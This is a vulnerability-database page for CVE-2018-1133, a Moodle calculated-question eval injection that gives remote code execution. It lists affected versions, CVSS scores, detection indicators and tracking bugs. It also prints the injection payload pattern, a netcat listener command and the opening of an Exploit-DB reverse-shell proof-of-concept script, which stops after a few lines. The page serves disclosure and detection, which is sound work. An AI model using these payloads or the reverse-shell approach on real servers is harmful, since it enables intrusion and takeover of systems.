CVE-2018-1133
Published 2018-05-25
CVE-2018-1133: An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.
Priority P272 · high · 8.8 (CVSS 3.0)
AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 32.23% (98.1th percentile)
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| moodle | moodle | >= 3.1 < 3.1.12 | 3.1.12 |
| moodle | moodle | 3.1.0 – 3.1.11 | — |
| moodle | moodle | >= 3.2 < 3.2.9 | 3.2.9 |
| moodle | moodle | 3.2.0 – 3.2.8 | — |
| moodle | moodle | >= 3.3 < 3.3.6 | 3.3.6 |
| moodle | moodle | 3.3.0 – 3.3.5 | — |
| moodle | moodle | >= 3.4 < 3.4.3 | 3.4.3 |
| moodle | moodle | 3.4.0 – 3.4.2 | — |
Detection & IOCs (extracted from sources)
- Monitor POST requests to /question/question.php with qtype=calculated containing eval-injectable answer fields such as backtick-wrapped $_GET references (e.g., `$_GET[0]`) in the answer[0] parameter.
- Detect exploitation attempts by looking for the pattern /*{a*/`...`;//{x}} in HTTP POST bodies targeting Moodle calculated question endpoints, which is the eval-injection payload structure.
- The exploit follows a specific multi-step HTTP sequence: login → course load → enable editing → add quiz → configure quiz → add calculated question → submit evil answer formula. Correlating this sequence from a single session is a strong indicator of exploitation.
- The vulnerability is tracked as MSA-18-0007 and described as: Calculated question type allows remote code execution by Question authors. Monitor teacher-role accounts creating Calculated questions.
- Exploitation requires a valid teacher (or question author) account on the Moodle instance and a course ID that the teacher has access to; unauthenticated exploitation is not possible.
- The exploit PoC targets Moodle 3.4.1 specifically; the CVE affects Moodle 3.x broadly. Verify affected version range before scoping detection.
- The reverse shell payload in the PoC uses Python and /bin/sh; server environments without Python or with restricted shell access may require a different payload, meaning the specific command IOC may vary in real attacks.
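CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
| osv | | 8.8 | HIGH | |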
OSV
Moodle calculated question type allows remote code execution by Question authors
osv·2022-05-13
CVE-2018-1133 [HIGH] Moodle calculated question type allows remote code execution by Question authors
An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.
GHSA
Moodle calculated question type allows remote code execution by Question authors
ghsa·2022-05-13
CVE-2018-1133 [HIGH] CWE-94 Moodle calculated question type allows remote code execution by Question authors
An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.
OSV
CVE-2018-1133: An issue was discovered in Moodle 3
osv·2018-05-25·CVSS 8.8
CVE-2018-1133 [HIGH] CVE-2018-1133: An issue was discovered in Moodle 3
An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.
No detection rules found.
Exploit-DB
Moodle 3.4.1 - Remote Code Execution
exploitdb·2019-03-15·CVSS 8.8
CVE-2018-1133 [HIGH] Moodle 3.4.1 - Remote Code Execution
---
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
*
* user The account username
* pass The password to the account
* ip Callback IP
* port Callback Port
* course Valid course ID belonging to the teacher
*
* Make sure you're running a netcat listener on the specified port before
* executing this script.
*
* > nc -lnvp 1010
*
* This will attempt to open up a reverse shell to the listening IP and port.
*
* You can start the script with `debug=true` to enable debug mode.
*/
namespace exploit {
class moodle {
public $ip;
public $port;
public $courseId;
public $cookie_jar;
public $url;
public $pass;
public $payload;
public $quizId = false;
public $moodleSession = false;
public $moodleKey;
// Ver
Exploit-DB
Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection
exploitdb·2018-10-11·CVSS 5.5
CVE-2018-8533 [MEDIUM] Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection
---
# Exploit Title: Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection
# Date: 2018-10-10
# Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Vendor: www.microsoft.com
# Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4)
# CVE: CVE-2018-8533
# References:
# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-REGSRVR-FILES-XML-INJECTION-CVE-2018-8533.txt
# https://www.zerodayinitiative.com/advisories/ZDI-18-1133/
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533
# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory
Bugzilla
CVE-2018-12179 edk2: improper configuration in system firmware leads to privilege escalation
bugzilla·2019-03-29·CVSS 7.8
CVE-2018-12179 [HIGH] CVE-2018-12179 edk2: improper configuration in system firmware leads to privilege escalation
Improper configuration in system firmware for EDK II may allow unauthenticated user to potentially enable escalation of privilege, information disclosure and/or denial of service via local access.
Reference:
https://edk2-docs.gitbooks.io/security-advisory/content/opal-blocksid-setting-disabled-after-s3.html
Discussion:
Created edk2 tracking bugs for this issue:
Affects: fedora-all [bug 1694085]
---
Created edk2 tracking bugs for this issue:
Affects: epel-all [bug 1694086]
---
Can you please work with the TianoCore Bugzilla InfoSec group to open up the upstream ticket to the public? Thank you.
---
Upstream bug:
https://bugzilla.tianocore.org/show_bug.cgi?id=1133
Patch proposed in upstrea
Bugzilla
CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release [fedora-all]
bugzilla·2018-05-25·CVSS 8.8
CVE-2018-1133 [HIGH] CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit m
Bugzilla
CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release [epel-all]
bugzilla·2018-05-25·CVSS 8.8
CVE-2018-1133 [HIGH] CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit messa
Bugzilla
CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release
bugzilla·2018-05-25·CVSS 8.8
CVE-2018-1133 [HIGH] CVE-2018-1133 CVE-2018-1134 CVE-2018-1135 CVE-2018-1136 CVE-2018-1137 moodle: Six security issues fixed in the latest release
MSA-18-0007: Calculated question type allows remote code execution by Question authors - CVE-2018-1133
Teacher creating Calculated question can intentionally cause remote code execution on server
https://moodle.org/mod/forum/discuss.php?d=371199
MSA-18-0008: Users can download any file via portfolio assignment caller class - CVE-2018-1134
Students who submitted assignments and exported it to portfolios can download any stored Moodle file by changing download URL
https://moodle.org/mod/forum/discuss.php?d=371200
MSA-18-0009: Portfolio forum caller class allows a user to download any file - CVE-2018-1135
Students who posted on forum and exported the post to po
Published: 2018-05-25